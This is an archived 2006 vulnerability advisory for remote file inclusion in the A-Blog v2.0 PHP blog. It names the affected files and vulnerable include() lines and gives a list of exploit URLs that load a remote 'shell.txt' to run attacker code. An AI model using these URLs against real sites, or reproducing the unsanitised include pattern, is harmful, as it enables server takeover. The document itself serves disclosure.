A-Blog v2.0 Remote File Include

2006-09-28T00:00:00
ID SECURITYVULNS:DOC:14470
Type securityvulns
Reporter Securityvulns
Modified 2006-09-28T00:00:00

Description

==============================================================================================

A-Blog v2.0 Remote File Include

===============================================================================================

Critical Level : Dangerous

A-Blog

http://prdownloads.sourceforge.net/a-blog/A-BlogV2.rar?download

Version : v2.0

================================================================================================

Bug in :

/navigation/links.php

/navigation/search.php

/navigation/donation.php

/navigation/latestnews.php

/sources/myaccount.php

================================================================================================

Vlu Code :

include("$navigation_start")

include("$navigation_middle")

include("$navigation_end")

include("$open_box")

include("$middle_box")

include("$close_box")

================================================================================================

Exploit :

http://localhost/A-Blog/sources/myaccount.php?open_box=http://shell.txt?

http://localhost/A-Blog/sources/myaccount.php?middle_box=http://shell.txt?

http://localhost/A-Blog/sources/myaccount.php?close_box=http://shell.txt?

http://localhost/A-Blog/navigation/search.php?navigation_end=http://shell.txt?

http://localhost/A-Blog/navigation/donation.php?navigation_start=http://shell.txt?

http://localhost/A-Blog/navigation/donation.php?navigation_middle=http://shell.txt?

http://localhost/A-Blog/navigation/donation.php?navigation_end=http://shell.txt?

http://localhost/A-Blog/navigation/latestnews.php?navigation_start=http://shell.txt?

http://localhost/A-Blog/navigation/latestnews.php?navigation_middle=http://shell.txt?

http://localhost/A-Blog/navigation/links.php?navigation_start=http://shell.txt?

http://localhost/A-Blog/navigation/links.php?navigation_middle=http://shell.txt?

================================================================================================

Discoverd By : v1per-haCker

Conatact : v1per-hacker[at]hotmail.com

XP10_hackEr Team

Greetz to : abu_shahad ; RooT-shilL ; hetler_jeddah ; BooB11 ; FaTaL ; ThE-WoLf-KsA ; mohandko ; fooooz ; maVen

and all members in XP10_hackEr Team

WWW.XP10.COM

==================================================================================================